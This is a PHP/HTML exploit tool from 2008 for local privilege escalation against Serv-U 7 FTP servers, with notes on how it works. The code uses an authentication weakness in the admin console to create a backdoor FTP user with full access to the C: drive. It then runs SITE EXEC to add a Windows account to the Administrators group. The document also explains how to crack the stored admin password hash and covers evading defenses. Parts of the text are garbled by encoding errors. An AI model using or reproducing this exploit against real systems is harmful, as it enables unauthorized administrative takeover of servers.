<?
/*
serv-u 7 local exp ver 1.0
www.inbreak.net
author [email protected] 2008-11-19
modify 2008-11-20
/
/
The following is the main data packet, for everyone to study. If you use asp and other languages and then written once and can reference.
Global user list:
GET /Admin/XML/OrganizationUsers. xml&ID=1 6 1&sync=1 2 2 7 0 7 8 6 2 5 0 7 8&ForceList=1 HTTP/1.1
Accept:
Accept-Language: zh-cn
Referer: <http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1>
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; . NET CLR 1.1.4322)
Host: 127.0.0.1:4 3 9 5 8
Connection: Keep-Alive
Cookie: domainid=3 8 4 1; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false;
killmenothing;
Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25787a8544280754
581406246bf8
Global c:/RWADNELCRNI:
POST /Admin/XML/Result. xml? Command=AddObject&Object=CServer. 0. DirAccess&Sync=1 2 2 7 0 8 1 2 6 1 6 4 0 HTTP/1.1
Accept:
Accept-Language: zh-cn
Referer: <http://127.0.0.1:43958/Admin/ServerDir.htm?Page=1>
User-Agent: Serv-U
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:4 3 9 5 8
Content-Length: 6 7
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: domainid=3 8 4 1; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false; killmenothing; Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25787a8544280754581406246bf8
Access=7 9 9 9&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&
this user c:/RWADNELCRNI:
POST /Admin/XML/Result. xml? Command=AddObject&Object=CUser. 6 1 8 0 6 0. DirAccess&Sync=1 2 2 7 0 8 1 4 3 7 8 2 8 HTTP/1.1
Accept:
Accept-Language: zh-cn
Referer: <http://127.0.0.1:43958/Admin/ServerUsers.htm?Page=1>
User-Agent: Serv-U
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:4 3 9 5 8
Content-Length: 6 7
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: domainid=3 8 4 1; domainodbc=0; SULang=zh,CN; domainname=g; homelinktip=false; killmenothing; Session=bbd30833f99ff4a5e8d4d7849358ef196ad7a83539d7cf25fcd0b097930494fbfe8d25787a8544280754581406246bf8
Access=7 9 9 9&MaxSize=0&Dir=%2Fc%3A&undefined=undefined&MaxSizeDisp=&
------------------------------Deficiencies---------------
Look forward to everyone to beautify this tool
For the su to set up the environment too much
Please here fill in theโฆ
*/
?& gt;
<html>
<title>Serv-u 7 local exp ver 1.0 by kxlzx</title>
<body>
<script>
function fun_showDiv(show)
{
document. getElementById(show). style. display=โblockโ;
}
</script>
<b>Serv-u 7 local exp ver 1.0 by kxlzx</b>
<form id=โform1โ name=โform1โ method=โpostโ action=โ?โ& gt;
<p><a href=โ#โ >admin password</a>
<input type=โtextโ name=โadmin_pwdโ value=โโ />
</p>
<p>directly mention the rights!
<input type=โsubmitโ name=โcmdโ value=โrightโ />
<a href=โ#โ >QA</a>
</p>
<pre>
<?
//Global var
$port=4 3 9 5 8;
$host=โ127.0.0.1โ;
$sessionid=โโ;
$getuserid=โโ;
$ftpport=2 1;
$ftpuser=โkxlzx_hackedโ;
$ftppwd=$_POST[โadmin_pwdโ];
$exec_addUser=โsite exec c:/windows/system32/net.exe user โ.$ ftpuser.โ โ.$ ftppwd.โ /addโ;
$exec_addGroup=โsite exec c:/windows/system32/net.exe localgroup administrators โ.$ ftpuser.โ /addโ;
if($_POST[โcmdโ]) {
//login-----------------------------------------
$sock_login = fsockopen($host, $port);
$URL=โ/Web%20Client/Login. xml? Command=Login&Sync=1 5 4 3 5 4 3 5 4 3 5 4 3 5 4 3โ;
$post_data_login[โuserโ] = โโ;
$post_data_login[โpwordโ] = $ftppwd;
$post_data_login[โlanguageโ] = โzh%2CCN&โ;
$ref=โhttp://โ.$ host.โ:โ.$ port.โ/? Session=3 9 8 9 3&Language=zh,CN&LocalAdmin=1โ;
$postStr = createRequest($port,$host,$URL,$post_data_login,$sessionid,$ref);
fputs($sock_login, $postStr);
$result = fread($sock_login, 1 2 8 0);
$sessionid = getmidstr(โ<sessionid>โ,โ</sessionid>โ,$result);
if ($sessionid!=โโ)
echo โlogin successful!\ r\nโ;
fclose($sock_login);//login-----------------------------------------
//getOrganizationId-------------------------------
$OrganizationId=โโ;
$sock_OrganizationId = fsockopen($host, $port);
$URL=โ/Admin/ServerUsers. htm? Page=1โ;
$postStr = createRequest($port,$host,$URL,โโ,$sessionid,โโ);
fputs($sock_OrganizationId, $postStr);
$resultOrganizationId=โโ;
while(! feof($sock_OrganizationId)) {
$result = fread($sock_OrganizationId, 1 0 2 4);
$resultOrganizationId=$resultOrganizationId.$ result;
}
$strTmp = โOrganizationUsers. xml&ID=โ;
$OrganizationId = substr($resultOrganizationId,strpos($resultOrganizationId,$strTmp)+strlen($strTmp),strlen($strTmp)+1 5);
$OrganizationId = substr($OrganizationId,0,strpos($OrganizationId,โ"โ));
fclose($sock_OrganizationId);
if ($OrganizationId!=โโ)
echo โget OrganizationIdโ.$ OrganizationId." Success!\ r\n";
//getOrganizationId-------------------------------
//getuserid---------------------------------------
$getuserid=โโ;
$sock_getuserid = fsockopen($host, $port);
$URL=โ/Admin/XML/User. xml? Command=AddObject&Object=COrganization.โ.$ OrganizationId.โ. User&Temp=1&Sync=5 4 6 6 6 6 6 6 6 6 6 6 6 6 6 6 6 3โ;
$ref=โhttp://โ.$ host.โ:โ.$ port.โ/ Admin/ServerUsers. htm? Page=1โ;
$post_data_getuserid=โโ;
$postStr = createRequest($port,$host,$URL,$post_data_getuserid,$sessionid,$ref);
fputs($sock_getuserid, $postStr);
$result = fread($sock_getuserid, 1 2 8 0);
$result = getmidstr(โ<var name="ObjectID" val="โ,โ" />โ,$result);
fclose($sock_getuserid);
$getuserid = $result;
if ($getuserid!=โโ)
echo โget user IDโ.$ getuserid." Success!\ r\n";
//getuserid---------------------------------------
//adduser-----------------------------------------
$sock_adduser = fsockopen($host, $port);
$URL=โ/Admin/XML/Result. xml? Command=UpdateObject&Object=COrganization.โ.$ OrganizationId.โ. User.โ.$ getuserid.โ& amp;Sync=1 2 2 7 0 7 1 1 9 0 2 5 0โ;
$post_data_adduser[โLoginIDโ] = $ftpuser;
$post_data_adduser[โFullNameโ] = โโ;
$post_data_adduser[โPasswordโ] = โ!โ;
$post_data_adduser[โComboPasswordTypeโ] = โ%E5%B8%B8%E8%A7%8 4%E5%AF%8 6%E7%A0%8 1โ;
$post_data_adduser[โPasswordTypeโ] = โ0โ;
$post_data_adduser[โComboAdminTypeโ] = โ%E6%9 7%A0%E6%9D%8 3%E9%9 9% 9 0โ;
$post_data_adduser[โAdminTypeโ] = โโ;
$post_data_adduser[โComboHomeDirโ] = โ/c:โ;
$post_data_adduser[โHomeDirโ] = โ/c:โ;
$post_data_adduser[โComboTypeโ] = โ%E6%B0%B8%E4%B9%8 5%E5%B8%9 0%E6%8 8%B7โ;
$post_data_adduser[โTypeโ] = โ0โ;
$post_data_adduser[โExpiresOnโ] = โ0โ;
$post_data_adduser[โComboWebClientStartupModeโ] = โ%E6%8F%9 0%E7%A4%BA%E7%9 4%A8%E6%8 8%B7%E4%BD%BF%E7%9 4%A8%E4%BD%9 5%E7%A7%8D%E5%AE%A2%E6%8 8%B7%E7%AB%AFโ;
$post_data_adduser[โWebClientStartupModeโ] = โโ;
$post_data_adduser[โLockInHomeDirโ] = โ0โ;
$post_data_adduser[โEnabledโ] = โ1โ;
$post_data_adduser[โAlwaysAllowLoginโ] = โ1โ;
$post_data_adduser[โDescriptionโ] = โโ;
$post_data_adduser[โIncludeRespCodesInMsgFilesโ] = โโ;
$post_data_adduser[โComboSignOnMessageFilePathโ] = โโ;
$post_data_adduser[โSignOnMessageFilePathโ] = โโ;
$post_data_adduser[โSignOnMessageโ] = โโ;
$post_data_adduser[โSignOnMessageTextโ] = โโ;
$post_data_adduser[โComboLimitTypeโ] = โ%E8%BF%9E%E6%8E%A5โ;
$post_data_adduser[โLimitTypeโ] = โConnectionโ;
$post_data_adduser[โQuotaBytesโ] = โ0โ;
$post_data_adduser[โQuotaโ] = โ0โ;
$post_data_adduser[โAccessโ] = โ7 9 9 9โ;
$post_data_adduser[โMaxSizeโ] = โ0โ;
$post_data_adduser[โDirโ] = โ%25HOME%2 5โ;
$postStr = createRequest($port,$host,$URL,$post_data_adduser,$sessionid,โhttp://127.0.0.1โ.โ:โ.$ port.โ/ Admin/ServerUsers. htm? Page=1โ);
fputs($sock_adduser, $postStr,strlen($postStr));
$result = fread($sock_adduser, 1 2 8 0);
fclose($sock_adduser);
echo โAdd User success!\ r\nโ;
//adduser-----------------------------------------
//addpower-----------------------------------------
$sock_addpower = fsockopen($host, $port);
$URL=โ/Admin/XML/Result. xml? Command=AddObject&Object=CUser.โ.$ getuserid.โ. DirAccess&Sync=1 2 2 7 0 8 1 4 3 7 8 2 8โ;
$post_data_addpower[โAccessโ] = โ7 9 9 9โ;
$post_data_addpower[โMaxSizeโ] = โ0โ;
$post_data_addpower[โDirโ] = โ/c:โ;
$post_data_addpower[โundefinedโ] = โundefinedโ;
$postStr = createRequest($port,$host,$URL,$post_data_addpower,$sessionid,โhttp://127.0.0.1โ.โ:โ.$ port.โ/ Admin/ServerUsers. htm? Page=1โ);
fputs($sock_addpower, $postStr,strlen($postStr));
$result = fread($sock_addpower, 1 2 8 0);
fclose($sock_addpower);
echo โadd the permissions to success!\ r\nโ;
//addpower-----------------------------------------
//exec-------------------------------
$sock_exec = fsockopen(โ127.0.0.1โ, $ftpport, &$errno, &$errstr, 1 0);
$recvbuf = fgets($sock_exec, 1 0 2 4);
$sendbuf = โUSER โ.$ ftpuser.โ\ r\nโ;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1 0 2 4);
$sendbuf = โPASS!\r\nโ;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fgets($sock_exec, 1 0 2 4);
$sendbuf = $exec_addUser.โ\ r\nโ;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1 0 2 4);
echo โexecutingโ.$ exec_addUser.โ\ r\n return$recvbuf\r\nโ;
$sendbuf = $exec_addGroup.โ\ r\nโ;
fputs($sock_exec, $sendbuf, strlen($sendbuf));
$recvbuf = fread($sock_exec, 1 0 2 4);
echo โexecutingโ.$ exec_addGroup.โ\ r\n return$recvbuf\r\nโ;
fclose($sock_exec);
echo โwell, Your 3 3 8 9 up clean-up ftp users log right now!\ r\nโ;
//exec-------------------------------
}
/** function createRequest
@author : kxlzx 2008-11-19
@port_post : administrator port $port=4 3 9 5 8;
@host_post : host $host=โ127.0.0.1โ;
@URL_post : target $URL=โ/Web%20Client/Login. xml? Command=Login&Sync=1 5 4 3 5 4 3 5 4 3 5 4 3 5 4 3โ;
@post_data_post : arraylist $post_data[โuserโ] = โโ;โฆ
@return httprequest string
*/
function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){
$data_string=โโ;
if ($post_data_post!=โโ)
{
foreach($post_data_post as $key=>$value)
{
$values[]=โ$key=โ. urlencode($value);
}
$data_string=implode(โ&โ,$values);
}
$request.=" POST โ.$ URL_post.โ HTTP/1.1\r\n";
$request.=" Host: โ.$ host_post.โ\ r\n";
$request.=" Referer: โ.$ referer.โ\ r\n";
$request.=" Content-type: application/x-www-form-urlencoded\r\n";
$request.=" Content-length: โ. strlen($data_string).โ\ r\n";
$request.=" User-Agent: Serv-U\r\n";
$request.=" x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; . NET CLR 1.1.4322)\r\n";
$request.=" Accept: /\r\n";
$request.=" Cache-Contr no-cache\r\n";
$request.=" UA-CPU: x86\r\n";
if ($sessionid!=โโ)
{
$request.=" Cookie: Session=โ.$ sessionid.โ\ r\n";
}
$request.=โ\ r\nโ;
$request.=$ data_string.โ\ r\nโ;
return $request;
}
//getMidfor2str copy from the internet
function getmidstr($L,$R,$str)
{
$int_l=strpos($str,$L);
$int_r=strpos($str,$R);
If ($int_l>-1&&$int_l>-1)
{
$str_put=substr($str,$int_l+strlen($L),($int_r-$int_l-strlen($L)));
return $str_put;
}
else
return โdid not find the required variables, ่ฏท่็ณป[email protected]โ;
}
?& gt;
</pre>
</form>
<div id=โadminpassdivโ style=โdisplay:noneโ>
<pre>
The default is empty, if the password is empty, the<b>to fill anything in.& lt;/b>
If modified, the administrator password the default will be here:
<b>C:\Program Files\RhinoSoft. com\Serv-U\Users\Local Administrator Domain\. Archive</b>
File find a MD5 password value.
C:\Program Files\RhinoSoft. com\Serv-U
Is su to the root directory.
Password value of style is(assuming that is 1 2 3 4 5 6)
kx#######################
#Representatives 1 2 3 4 5 6 a 3 2-bit MD5 encryption, and kx is su to the md5 cryptographic algorithm to improve the random 2-bit characters.
After the break the password is<b>kx</b>1 2 3 4 5 6 Remove the kx is the password.
You can for this encryption to generate a dictionary.
auther:kxlzx www.inbreak.net
</pre>
</div>
<div id=โQAdivโ style=โdisplay:noneโ>
<pre>
<b>A, The su7 is the right there are several way?& lt;/b>
There are two forms to get rid of su7 in.
1>, login to the Administrator Console page
==>get the OrganizationId for Add User
==>get the global user of theโnext new user IDโ
==>add a user
==>add user permissions or add a global user permission
==>user login
==>execute system command to add the system account.
2>, login to the Administrator Console page
==>basic WEB client
==>come to serv-u DirectoryโusersโGlobal user directory
==>upload the one you have defined in the user file
==>user login
==>execute system command to add the system account
While this document uses the<b>first</b>method.
<b>second, the mention of the right to the principle?& lt;/b>
Su7 Management Platform is http, very advanced.
Capture, analysis, found the following walk can be utilized.
1, The administrator from the Management Console open the web page, is not required to verify the password.
2, The administrator if using a URL to open the web page, although the need to enter a password, but no matter what to enter, can enter.โ/? Session=3 9 8 9 3&Language=zh,CN&LocalAdmin=1โ
3, The administrator can add users there are two, one is a global user, one is a domain user. While the permission set is also two, one is global, one is for the user.
4, The administrator added the user of this package and set the permissions for this pack, is separate.
So, I can capture and then converted into a php socket connection post out.
Finally, in classic ftp login, and exec commands. To improve the right.
In writing php in the process, encountered many problems, such as function not used, etcโ_โ! I havenโt learned php thanks to theโcloud Shu cowโto help you.
In the analysis of the Packet Flow, and found some of the features, the server returns the data, all in xml format. While in the process of data transmission, The design is very classic.
Su7 also has its own database, and he also will own generated an id.
This ID is random, in that you create a user, will first request that the server generate one, generate a good post, modify the id of the user name, password, etc.
Itโs like the oracle of the insert means.
Write tools in the process, encountered a lot of trouble, the biggest trouble is this ID problem, and later analyze it.
To add permissions, but also can make use of this ID.
Thus the tool a total connected 6 times to the server, which several times are:
1, to the landing platform, and use that input any password can be the landing page address. Returns a sessionid, this sessionid in the future of the package are used up.
2, get the OrganizationId for Add User
3, to request a user ID.
4, modify the ID of the login user name, and password.
5, modify the ID of the permission, plus the c drive write delete execute etc.
6, this connection is doing bad, use the previous add the user to perform system commands.
<b>three, why should I display a success, but not up there?& lt;/b>
It depends on error code, here even very ashamed, and did not write a detailed error code of the judge.
Generally have the following several situations:
1, It may be because the administrator password is wrong.
Referring to the administrator password of the connection.
2, it may be because the administrator limits the execution of the SITE EXEC.
To be program modifications, the program can be added to a so that he does not limit function.
3, may be a program problem.
<b>4, why the author has so many reasons not to change?& lt;/b>
Donโt you see? Once the things done to perfection, that the comparison system of the defense program came out.
If imperfect, let him think we this point means that the defense system will also think so.
Do not believe it, over a period of time, the defensive scheme out, there certainly is one:โto modify the site exec is not access.โ
When the time comes, Iโll write a function, put this thing changed back.
So, like everyone is promoted to XXXX, Iโll solve XXXX problem. Everyone first so play it.:)
auther:kxlzx www.inbreak.net
</pre>
</div>
</body>
</html>